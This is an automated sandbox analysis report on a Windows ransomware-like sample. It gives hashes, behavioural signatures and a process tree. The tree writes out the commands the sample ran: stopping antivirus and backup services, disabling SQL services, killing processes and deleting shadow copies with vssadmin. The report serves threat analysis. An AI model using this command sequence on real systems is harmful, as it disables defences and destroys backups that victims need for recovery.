Analysis
-
max time kernel
151s -
max time network
120s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
26-07-2021 12:40
Static task
static1
Behavioral task
behavioral1
Sample
10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe
Resource
win10v20210408
General
-
Target
10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe
-
Size
61KB
-
MD5
2a66b3b2638dfc5dfcf8aaf825993269
-
SHA1
4e04822d6b8c3087be0550dba96f0c80d84359f8
-
SHA256
10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5
-
SHA512
1d63645dc8564057367ed295cb56b0aebdb071b652786d67ae2d9fc0371a034231ace703001bc353b303000fde0c6f9774a120ace83b665964278f8e7127c435
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 3524 vssadmin.exe 3176 vssadmin.exe 228 vssadmin.exe 3884 vssadmin.exe 2532 vssadmin.exe 3100 vssadmin.exe 492 vssadmin.exe 1184 vssadmin.exe 4088 vssadmin.exe 272 vssadmin.exe 3220 vssadmin.exe 3912 vssadmin.exe 216 vssadmin.exe 1204 vssadmin.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 3260 taskkill.exe 2908 taskkill.exe 2040 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exepid process 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exetaskkill.exetaskkill.exetaskkill.exevssvc.exedescription pid process Token: SeDebugPrivilege 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe Token: SeDebugPrivilege 3260 taskkill.exe Token: SeDebugPrivilege 2908 taskkill.exe Token: SeDebugPrivilege 2040 taskkill.exe Token: SeBackupPrivilege 204 vssvc.exe Token: SeRestorePrivilege 204 vssvc.exe Token: SeAuditPrivilege 204 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 604 wrote to memory of 3132 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe net.exe PID 604 wrote to memory of 3132 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe net.exe PID 3132 wrote to memory of 1708 3132 net.exe net1.exe PID 3132 wrote to memory of 1708 3132 net.exe net1.exe PID 604 wrote to memory of 3352 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe net.exe PID 604 wrote to memory of 3352 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe net.exe PID 3352 wrote to memory of 3332 3352 net.exe net1.exe PID 3352 wrote to memory of 3332 3352 net.exe net1.exe PID 604 wrote to memory of 184 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe net.exe PID 604 wrote to memory of 184 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe net.exe PID 184 wrote to memory of 2340 184 net.exe net1.exe PID 184 wrote to memory of 2340 184 net.exe net1.exe PID 604 wrote to memory of 1476 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe net.exe PID 604 wrote to memory of 1476 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe net.exe PID 1476 wrote to memory of 3384 1476 net.exe net1.exe PID 1476 wrote to memory of 3384 1476 net.exe net1.exe PID 604 wrote to memory of 1580 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe net.exe PID 604 wrote to memory of 1580 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe net.exe PID 1580 wrote to memory of 3468 1580 net.exe net1.exe PID 1580 wrote to memory of 3468 1580 net.exe net1.exe PID 604 wrote to memory of 2060 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe sc.exe PID 604 wrote to memory of 2060 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe sc.exe PID 604 wrote to memory of 3904 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe sc.exe PID 604 wrote to memory of 3904 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe sc.exe PID 604 wrote to memory of 2280 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe sc.exe PID 604 wrote to memory of 2280 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe sc.exe PID 604 wrote to memory of 2180 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe sc.exe PID 604 wrote to memory of 2180 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe sc.exe PID 604 wrote to memory of 3260 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe taskkill.exe PID 604 wrote to memory of 3260 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe taskkill.exe PID 604 wrote to memory of 2908 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe taskkill.exe PID 604 wrote to memory of 2908 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe taskkill.exe PID 604 wrote to memory of 2040 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe taskkill.exe PID 604 wrote to memory of 2040 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe taskkill.exe PID 604 wrote to memory of 216 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 216 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 1184 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 1184 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 1204 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 1204 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3884 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3884 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 4088 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 4088 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3524 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3524 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3176 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3176 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 228 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 228 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 272 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 272 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 2532 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 2532 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3220 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3220 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3100 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3100 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3912 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3912 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 492 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 492 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe vssadmin.exe PID 604 wrote to memory of 3520 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe arp.exe PID 604 wrote to memory of 3520 604 10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe arp.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe"C:\Users\Admin\AppData\Local\Temp\10dc9cb12580bc99f039b1c084ca6f136047ac4d5555ad90a7b682a2ffac4dc5.sample.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\vssadmin.exe"vssadmin.exe" Delete Shadows /all /quiet2⤵
- Interacts with shadow copies
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/184-121-0x0000000000000000-mapping.dmp
-
memory/216-134-0x0000000000000000-mapping.dmp
-
memory/228-141-0x0000000000000000-mapping.dmp
-
memory/272-142-0x0000000000000000-mapping.dmp
-
memory/492-147-0x0000000000000000-mapping.dmp
-
memory/604-116-0x000000001BA90000-0x000000001BA92000-memory.dmpFilesize
8KB
-
memory/604-114-0x0000000000EF0000-0x0000000000EF1000-memory.dmpFilesize
4KB
-
memory/1184-135-0x0000000000000000-mapping.dmp
-
memory/1204-136-0x0000000000000000-mapping.dmp
-
memory/1476-123-0x0000000000000000-mapping.dmp
-
memory/1580-125-0x0000000000000000-mapping.dmp
-
memory/1708-118-0x0000000000000000-mapping.dmp
-
memory/2040-133-0x0000000000000000-mapping.dmp
-
memory/2060-127-0x0000000000000000-mapping.dmp
-
memory/2180-130-0x0000000000000000-mapping.dmp
-
memory/2280-129-0x0000000000000000-mapping.dmp
-
memory/2340-122-0x0000000000000000-mapping.dmp
-
memory/2532-143-0x0000000000000000-mapping.dmp
-
memory/2908-132-0x0000000000000000-mapping.dmp
-
memory/3100-145-0x0000000000000000-mapping.dmp
-
memory/3132-117-0x0000000000000000-mapping.dmp
-
memory/3176-140-0x0000000000000000-mapping.dmp
-
memory/3220-144-0x0000000000000000-mapping.dmp
-
memory/3260-131-0x0000000000000000-mapping.dmp
-
memory/3332-120-0x0000000000000000-mapping.dmp
-
memory/3352-119-0x0000000000000000-mapping.dmp
-
memory/3384-124-0x0000000000000000-mapping.dmp
-
memory/3468-126-0x0000000000000000-mapping.dmp
-
memory/3520-148-0x0000000000000000-mapping.dmp
-
memory/3524-139-0x0000000000000000-mapping.dmp
-
memory/3884-137-0x0000000000000000-mapping.dmp
-
memory/3904-128-0x0000000000000000-mapping.dmp
-
memory/3912-146-0x0000000000000000-mapping.dmp
-
memory/4088-138-0x0000000000000000-mapping.dmp